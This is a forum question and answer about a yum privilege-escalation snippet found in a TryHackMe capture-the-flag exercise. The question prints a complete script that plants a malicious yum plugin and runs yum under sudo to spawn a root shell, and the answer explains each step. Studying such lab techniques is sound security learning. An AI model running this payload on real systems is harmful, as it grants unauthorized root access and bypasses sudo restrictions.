# Yum privilege escalation

Tags: linux, yum, privilege-elevation

I found this piece of code while doing some ctf on tryhackme. And I don't understand it. Can somebody explain me what exactly it does?

```
TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y
```

Answer (score 0):

Of course, this privilege escalation technique obviously makes use of the user privilege to run `yum` as `sudo`.

`TF=$(mktemp -d)` creates a temporary directory.

Afterwards, three files are created inside the temp directory (accessible through `$TF`) by "catting" content into them.

To visualize this, you can run the following commands in a bash shell (without leading > of course):

```
> touch test

> cat >test<<EOF 
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

> cat test
```

This will print out the just "catted" content inside the file called `test`.

The last step: `sudo yum -c $TF/x --enableplugin=y` simply executes a regular yum command, making use of the just created files mentioned above. The payload `def init_hook(conduit): os.execl('/bin/sh','/bin/sh')` will then be executed giving you a shell as root since you execute it with `sudo`.

I hope this is helpful.